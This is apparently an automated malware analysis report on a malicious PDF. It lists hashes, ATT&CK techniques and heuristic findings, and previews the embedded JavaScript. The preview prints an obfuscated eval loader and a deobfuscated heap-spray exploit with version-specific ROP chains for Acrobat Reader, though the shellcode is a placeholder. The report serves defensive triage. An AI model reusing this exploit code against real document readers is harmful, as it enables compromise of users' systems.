PDF malware analysis — malicious · 4d29626e4e2f1241

MALICIOUS

PDF

5.7 KB Created: 2009-05-05 21:16:20 Authoring application: aaa (via vvvv) First seen: 2026-05-11

MD5: e3b0503f57a273759193b1f8704fe399 SHA-1: 3f57d28ac54e61c3578384dc9d347b194961c836 SHA-256: 4d29626e4e2f1241a1b0bd9c37f8b3cddd991a3baf734474e3950cec8c7da51d

116 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File

The PDF document contains embedded JavaScript, flagged by multiple heuristics including ML_NYX_PDF_MALICIOUS. The deobfuscated JavaScript, named 'acroform_b64_00.js', is likely responsible for executing the malicious payload. The presence of JavaScript actions and embedded JS streams strongly indicates an exploit attempt within the PDF.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

var gxSLcpOPsRKf='jYtmfcNu';try{gxSLcpOPsRKf="app.alert";throw new Error\('mHcNaHMZm'\);app.alert\('otCnkBGDo'\);}catch\(Error\){gxSLcpOPsRKf='eval'};function MRCnMlSj\(str\){var YZOfsBunY='qXAhSfwJ';try{throw new Error\('vIpmDUFeT'\);}catch\(Error\){var YZOfsBunY="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";}var UFavIhu="";var Xol="";for\(var i=0;i<str.length;i++\){UFavIhu+=chKDA\(\(6-YZOfsBunY.indexOf\(str.substr\(i,1\)\).toString\(2\).length\)\)+YZOfsBunY.indexOf\(str.su …
endstream

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`acroform_b64_00.js`	deobfuscated-js	PDF AcroForm base64 (raw) at offset 0x5C4	2803 bytes
SHA-256: `2dcc302789541914f37753c067c2c4ea2237a5b048127e1f3f24d5698bb1be31`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script function repeat(count,what) {var v = "";while (--count >= 0) v += what;return v;} var ver = app.viewerVersion; var sc = unescape("SHELLCODE"); function spray_func(sc,nop_slide,count){ var sz = 1024; var spray = repeat(nop_slide,1024*15-(sc.length/2))+sc; var FirstEntry = repeat(nop_slide,sz-18); var OtherEntry = repeat(nop_slide,sz-11); mem=new Array(); for(i=0;i<count;i++){ if(i==0){ mem[i]=FirstEntry+spray; }else{ mem[i] = OtherEntry+spray; } } } if(ver<8){} else if(ver<9){ rop8=unescape("%u17f2%u4a82%u5000%u4a84%u630f%u4a80%u7ec9%u4a81%u203c%u4a82%u57bc%u4a80%u156a%u4a82%u54e0%u4a82%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0008%u0000%u597d%u4a80%u7ec9%u4a81%u2038%u4a82%u57bc%u4a80%u156a%u4a82%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0008%u0000%u597d%u4a80%u7ec9%u4a81%u2030%u4a82%u57bc%u4a80%u156a%u4a82%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u17f2%u4a82%u5004%u4a84%u630f%u4a80%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0030%u0000%u597d%u4a80%u7ec9%u4a81%u5004%u4a84%ua649%u4a81%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u0020%u0000%u597d%u4a80%u17f2%u4a82%u156a%u4a82%u00a0%u4a82%u7ec9%u4a81%u0034%u0000%u795a%u4a80%u17f2%u4a82%u156a%u4a82%ufe83%u4a81%ue982%u4a81%u000a%u0000%u597d%u4a80%u7ec9%u4a81%u2140%u4a82%u57bc%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%u258b%u5000%u4a84%u4d4d"); nop_slide8 = unescape("%u12c4%u4a80"); spray_func(rop8 + sc,nop_slide8,2000); this.pageNum = 2; }else if(ver<10){ rop9=unescape("%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%u258b%u0000%u4a8a%u4d4d"); nop_slide9 = unescape("%u1064%u4a80"); spray_func(rop9+sc,nop_slide9,2000);this.pageNum = 3; }

Open this report in the interactive analyzer, or submit your own file for analysis.